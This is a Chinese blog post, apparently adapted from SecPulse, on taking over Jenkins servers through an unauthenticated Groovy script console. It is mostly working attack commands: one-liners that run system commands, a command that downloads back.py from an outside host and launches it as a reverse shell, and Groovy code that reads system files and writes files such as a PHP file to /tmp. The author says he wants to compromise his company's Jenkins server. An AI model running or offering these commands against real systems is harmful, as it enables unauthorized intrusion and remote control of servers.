最近一直在学习怎么利用jenkins反序列化,妹的,就是没有一个顺手的GUI工具,能让我直接秒杀服务器。
楼下的小伙伴有好的工具,请给我留言,我要秒了我们公司的jenkins服务器,多谢。。。。
关于反序列化的问题,如果不懂java就是苦逼,小弟我就是这样的苦逼,这个先放一边,先把jenkins拿shell的方法整理一下。
文章来自安全脉搏,略有改动,更加精简。。。
一、Jenkins未授权访问可执行命令
命令执行的话,是需要有相关用户权限的,具体的位置在下图中:
在脚本命令行中输入下面的语句,即可执行相应的命令:
println "ipconfig /all".execute().text
推荐上面的这种方式,比较简洁。。
def sout = new StringBuffer(), serr = new StringBuffer() def proc = 'ipconfig'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr"
老外的方式,比较正式一点。。
下面的截图是执行后的结果,就像在CMD中执行是一样的效果。
二、Jenkins拿shell方法
1、直接wget下载back.py反弹shell,如下:
println "wget http://www.waitalone.cn/tools/back.py -P /tmp/".execute().text println "python /tmp/back.py 10.1.1.111 8080".execute().text
2、多种方式写shell
Groovy I/O 文件读写
读文件
new File("/tmp/back.py").getText();
new File("c:/windows/win.ini").getText();
//eachLine -- 打开和读取文件的每一行
new File("/tmp/back.py").eachLine {
println it;
}
//readLines
lineList = new File("/tmp/back.py").readLines();
lineList.each {
println it.toUpperCase();
}
write轻轻松松写文件
new File("/tmp/1.php").write('Hello SecPulse');
多行写入
new File("/tmp/1.php").write("""
This is
just a test file
to play with
""");
3、文章参考:
http://www.secpulse.com/archives/2166.html
from www.waitalone.cn.thanks for it.
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论